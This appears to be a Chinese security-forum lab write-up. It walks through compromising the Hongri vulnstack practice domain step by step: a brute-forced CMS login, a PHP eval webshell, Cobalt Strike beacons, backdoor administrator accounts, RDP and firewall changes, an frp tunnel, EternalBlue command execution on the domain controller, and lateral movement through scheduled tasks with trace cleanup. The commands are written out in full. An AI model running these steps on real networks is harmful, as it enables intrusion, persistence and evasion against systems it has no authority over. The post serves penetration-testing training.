问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
内网渗透初级篇-一次对简单的域环境渗透过程
漏洞分析
渗透测试
安全工具
从信息收集,web网站一直到打入内网,控制主机的过程。使用到了密码爆破、一句话木马、通信隧道建立、漏洞利用等知识。适合刚开始学习内网的读者阅读。
一、环境搭建 ====== 环境简介: ----- | 操作系统 | IP地址 | |---|---| | 攻击者 kali | IP地址:192.168.31.77 | | 攻击者 Windows 10 | IP地址:192.168.31.83 | | windows 7 | 外网地址:192.168.31.215 内网地址:192.168.52.143 | | windows 2008 | IP地址:192.168.52.138 | | windows 2003 | IP地址:192.168.52.141 | ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-8ae70b440d06451b2ba14b9d4bbb1412f8b1a734.png) 此次渗透学习利用了红日安全团队的域环境。非常好的学习环境,通过渗透该环境能够学习到很多知识。 下载地址:<http://vulnstack.qiyuanxuetang.net/vuln/detail/2/> (一)win7 web服务器设置 ---------------- ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-4934461d66eb0b84d0058643333d3c54d9bdde0d.png) phpstudy中设置网站目录为 `C:/phpstudy/www/yxcms`, 点击应用。![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c866e766643897cd02f79896a1c6fc2db40c1305.png) 站点域名管理中网站目录设置为C:/phpstudy/www/yxcms 网站域名如下设置 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e563069b05978e958a98f01ce7f96eb49e622124.png) hosts文件 如下设置 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a86c43e8ea2d467bafc20906664d11013eee5430.png) (二)KALI设置 --------- 在kali攻击机的 `/etc/hosts` 文件中 添加www.yxcms123.com的域名解析 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0eb8d8a3b8139b23ee8088d77e737811d307153a.png) 这样就通过浏览器,输入域名直接访问网站。而不是使用IP地址,是渗透环境更加真实。 二、渗透WEB服务器 ========== (一)信息收集 ------- 设置完成后 浏览器输入 www.yxcms123.com 可以正常打开web页面 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-58f1d8da15b2dea2c891288ed7537d85c1fb2b37.png) 使用`nmap`对网站进行扫描 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5eb09e23ecd984062b35f9f90b8a9ffe9c9d9a6f.png) yxcms系统的管理员登录页面通常为 `index.php?r=admin/index/login` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c0afec554a4e66689b3f3aa488d5d377910217e1.png) 尝试修改为 admin ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-598b6dbde4a18f36644eeaea4163c02ca1e42c06.png) (二)爆破用户名密码 ---------- 利用BurpSuite对用户名和密码进行爆破 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e65202772b68f5c4baac79dd277b508b75399290.png) 设置字典文件 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-fed22ef7925b9a06e71412900649378dd161c69f.png) 开始爆破,发现密码123456的返回值和其他的返回值长度明显不一样。 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e35a0ef9fb5da8eb3e937cf8a88df4e746bd9e8c.png) 使用 admin/123456登录,登录成功。 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c27ddf139077db2d2d2a1bd27c83fbb6bd8c27bb.png) 版本:YxcmsApp 1.2.1 【未授权】 (三)获得Shell ---------- 登录成功后,尝试写入一句话木马。 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-9147e6b8f2c11f602d6faacc1e044abdd5acbad7.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-8f9220ad76ed4c1c2cec661121ac1b0997b4d58e.png) 写入 PHP的一句话木马 ```php <?php @eval($_POST['pass']);?> ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0392c66d9d85ecb4fbaee3d0665797cc32de4283.png) 使用菜刀或蚁剑连接都可以 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-3879e2522a73f42cdb1f1e55ccd3dbde297be4d2.png) 获得了WEB服务器的Shell ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5089f6f71600c95ebd1a56e05f27dce0e327fa99.png) (四)主机信息收集 --------- 查看WEB服务器的网络地址 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-78629f7f9b5350513789313b4565ee0d1e384749.png) 查看当前用户 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b271b9315eb95722c14640a5a721b3e6eed6e8e7.png) 查看防火墙的配置信息 ```php netsh firewall show config ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-9195ed127b7b85960a68d8f941c60df6578c2203.png) 检查安装的杀毒软件 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d10c7f19798907d5df3385e1b8f651aeaa505fb7.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-346192c7219f2960de35242904533a120126630c.png) 发现没有安装杀毒软件。 (五)上线CS ------- 利用CS生成Payload ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5cdb8cb7a7ffe1559c3583dc3cbb98608fc32f50.png) 复制生成的txt内容,利用菜刀或蚁剑的终端执行 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2df65a1c47706e4769fdfd682dbd78c36f6d2c82.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-50bbb3a507f8bff91063b0135f28ad89f28c4e89.png) 片刻, 可以看到已经上线 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-6533bc9246601f78dfbcb8975b64120c60b5424f.png) 修改延迟时间,因为这里是靶机环境,为了学习用的,所以将时间直接设置为0 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-21bb8175f2357c3e0af4bb0e177301145056dcdb.png) (六)内网信息收集 --------- 使用大余师傅编写的插件上传nbtscan 并进行内网搜集,插件主要是为了方便,提高效率。没有的话手动上传也可以。 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-86a9ad3aa2be58c31f9ec449d1a4a217793094b4.png) 扫描到内网的三个 ip地址 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b597ea76bd569e76bb34fe9de4ea4f63c4a6f0aa.png) 192.168.52.138是域控制器 关闭web服务器的防火墙(主机信息收集可以得知操作系统信息) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-9ee9b0a5d10a6590fd5b7e8c4ab480a42438087d.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-889276b53c9708000f87e824ed32706e7942e85e.png) 查看web机器的密码 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b7582ab991e236f7f2af762725aadc235e59472c.png) 当前密码为p@ssw0rd ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e0fbd695074218ad87ec0a495663ab2d171001fd.png) (七)创建新用户 -------- 创建用户并加入组 ```php shell net user biu Pass!@#4 /add ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d69de4fc60cd7f22d51a841dbab75c9ab5395a16.png) 加入管理组 ```php shell net localgroup administrators biu /add ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-4388561e43cfad98642734c0f2a6f8c38fce1c07.png) 在实战中,创建新用户还是比较容易被发现的。 (八)拓展-开启远程桌面 ------------ 开启3389端口 win7 以上 设置远程桌面端口 ```php reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f ``` 开启远程桌面 ```php wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 ``` 检查端口状态 ```php netstat -an|find "3389" ``` 关闭远程桌面 ```php wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0 ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f459d5aca9569acc1b623dea9e304994a7cc2611.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-251eeb31ce8f2c5c240312d497518786fa127066.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-db1be836f4f5b51f70e44907ba2214bfc460cbe7.png) 防火墙 放行RDP(如需放行) ```php shell netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow ``` 在实战中不到万不得以最好不要登录远程桌面,非常容易被发现。 三、建立通信隧道 ======== 利用frp建立一条一级代理,使WEB服务器作为一个跳板,这样攻击者就可以直接访问到域内的其他主机了。 frp 客户端配置信息 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-32706cd2f528356bc1153f1abc3b0521fa59959a.png) 192.168.31.83 是frp服务端的的IP地址 服务器端的配置 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-be4a628006cf5d2d8ef6f55eaa4b0d9478cb020c.png) 将客户端 frpc.exe 及配置文件 frpc.ini上传到web靶机 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-84f9c0ccb971eafbfb7429cfc5c491327d32bcbc.png) 等待片刻 上传完成 **注意**:上传frp完成时一定要看一下文件的大小,有时候文件会上传的不完整导致程序无法执行。 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-bf71bf8cd315d8170ccfc986e64bd80e32a2ea04.png) 在服务端(攻击机 Windows 10)开启监听 ```php frps.exe -c frps.ini ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c0a157d78b47ee9baf3329fdae9e43684aa3d300.png) 客户端运行 frpc.exe ```php shell frpc.exe -c frpc.ini ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-23dcef6c1abf3f6e9f07bb825fac5b7f30f293c5.png) 在服务端可以看到 监听成功 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0c60f6258aa64a8034b50e931ec40223aaf9ea1d.png) 四、渗透域控制器 ======== (一)利用M etasploit渗透域控 -------------------- msf设置代理 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a98319e90750dcd7eb4809eed9a0b5eda415dcdc.png) 搜索smb,使用第16个`smb/smb_version` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d9e8d1696a50ed1caa616db139b8c2d1f8e24da6.png) 使用`smb_version` 对192.168.52.143/24内网进行扫描,确认之前扫描到的信息 同样扫描到IP地址:143,138,141 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-fa8a2eb2962de1b644050d8867c3cc06c6dd5025.png) 扫描的同时可看到代理服务器在走数据 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a68aff0a8ff8db87f732368100b73873cc4ceadc.png) 使用 ms17\_010\_command 提权(利用该模块可以在存在漏洞的主机上执行cmd命令) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-3761203366833388c61f287edba17e61a581d6c3.png) COMMAND即为要执行的cmd命令 RHOSTS为 目标主机的IP地址 默认 执行 `net group "Domain Admins" /domain`命令 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-97533efc3c1f6ac5a635b6481b3ca87dcd727f02.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-df8b9f39b80345ebd209ca429582efaae348830e.png) 尝试执行`ipconfig`命令 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-85eb41f5467d4e297f7318c1f510e0d45b61fb70.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2562f19e5c46418c8320949fbe7b3c674563de01.png) 在目标机器上 创建用户,加入管理员组 ```php set command net user biu138 "p@ssw0rd" /add run set command net localgroup administrators biu138 /add run set command net user biu138 run ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-24396d09e91fc79674998e6f961a013d82ab803f.png) (二)CS生成木马 --------- 在CS中,设置中转监听。 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-89352cdc856c5fb5de8acd1a8a93eec751ca66b2.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c97389522f434051ea4280c9ca5eaf562b69bacc.png) 查看监听器 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a810d657bcded6bb05127e2cf3a99f32e181a02a.png) 生成木马 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e7e928f9c339696709113dac8cf1ab0bed078648.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-85c5627c4c5349ece152b3adebd71b9e3feb28ac.png) 生成一个 beacon.exe, 现在需要将 beacon.exe上传到内网中 (三)上传木马到域控 ---------- 先用 CS将beacon.exe 上传到web服务器 52.143中 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-acd5804ed336b2ac37b3ab3ade054847ce7e33e2.png) 然后在 web服务器 执行cmd命令开启共享 ```php shell net use \\192.168.52.138\ipc$ p@ssw0rd /user:biu138 ``` (biu138是 域用户,对141渗透时无需再执行 该命令) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-6705845d06a5ae51a3941d3a7125a2ea9f6a17f3.png) 然后进入138主机的目录 ```php shell dir \\192.168.52.138\c$ ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7bf77bf5bf7d1de8a2e6fa330ff7d7d608347595.png) 然后查看 138主机中运行的进程 ```php shell tasklist /S 192.168.52.138 /U biu138 /P p@ssw0rd ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7fbc6630970771158e1aea5dd9b5eb888622a73a.png) 使用平台 检测 主机是否存在杀软 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-42f0d1fc604d31c1c5fb0d03af08276bca60de21.png) 没有安装杀软 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-09a644ec08415d1349cca36774abe45e0793717d.png) 复制beacon.exe 到 52.138主机上 ```php shell copy C:\phpStudy\WWW\yxcms\beacon.exe \\192.168.52.138\c$ ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f9bf193a69f93f4478286993d8fe7dc5f9263388.png) 上传木马到域控的方法还有很多,比如利用web服务器下载。这里先只介绍这么一种。 (四)执行木马上线CS ----------- 利用msf 执行 beacon.exe木马 ```php set command cmd /c "c:\beacon.exe" run ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-066fcf3ad52b64998a37c137b80e215160fe54c0.png) 可以看到138 已经通过中转上线 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-39138cd037be852bfc4afb23eaea1e5c0c965ad0.png) 进行提权获得一个 稳定的shell ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-66368b59b332055d30c743d414f88cfe3924c801.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-fa58428ab71020b9df926a4c2575cdefb680cc45.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-678959288e17c0bdf8a5191f44fa305497bdbb7f.png) 五、渗透内网主机 ======== (一)上传木马 ------- 利用同样的方法拿141主机 使用刚才渗透域控的木马,或者重新生成一个新的木马都可以。 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b5675fa27bc8bee4e9de3358cece4bada12e200b.png) 上传到143主机 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-97b7ee0b3b556ad9dbcc04e8a8826872c739cde2.png) 复制beacon2.exe到 141主机上 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-ec6778116148036137ac653e545e005b8338ec3c.png) (二)利用定时任务执行木马 ------------- 查看 141主机当前的时间 ```php shell net time \\192.168.52.141 ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-78f133ba236280a41cefb9ebb924731bf5df1350.png) 创建定时任务 ```php shell at \\192.168.52.141 16:39:00 C:\beacon2.exe ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a8b2c27734bb37ada7e586dc6bba770b2d7b09d8.png) 清楚创建 定时任务的痕迹 ```php shell at \\192.168.52.141 <定时任务ID> /delete ``` ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f7810535c0a486c917512ab91ec93425a7524e8b.png) 成功上线 三台靶机全部上线,而且是最高权限 ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-aa5fc99ebc3bcb9f0ed0d930e5cc24aef598078a.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0683e2f9d60eb9979afa113df9caca67fa6899f3.png) ![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-48b80c93685fb8f4a048b8bb7632ab4e49108534.png) 六、总结 ==== 这是初学域渗透时做的学习笔记,域环境相对来说比较简单,但是还是能够学习到很多的知识,在实战中也可以应用。首先利用BurpSuite爆破获得啦网站的密码,然后通过一句话木马获得shell并上传木马上线CS。建立通信隧道使得攻击者能够直接访问到域内的主机,使用传说中的永恒之蓝漏洞拿下了域控并上线CS。同样利用相同的方式将木马上传到内网用户,并利用定时任务执行,使之上线CS。通过该环境能学习到很多知识,攻击的方法还有好多,可以自行发掘。
发表于 2021-08-23 10:45:14
阅读 ( 6093 )
分类:
内网渗透
0 推荐
收藏
3 条评论
0ne酱
2021-08-23 18:24
入口点WEB服务器,你不都已经抓到域管的明文了嘛。。。。。
请先
登录
后评论
飞神剑
2021-08-26 10:29
那是我设的,这个地方我没用
请先
登录
后评论
小何同学
2023-01-03 22:51
上线CS处没有上线是什么原因呢?
请先
登录
后评论
请先
登录
后评论
飞神剑
一个起早贪黑的保安
2 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!